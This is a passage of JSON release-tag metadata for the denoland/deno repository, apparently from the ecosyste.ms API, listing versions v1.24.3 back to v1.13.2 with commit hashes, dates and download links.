deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pk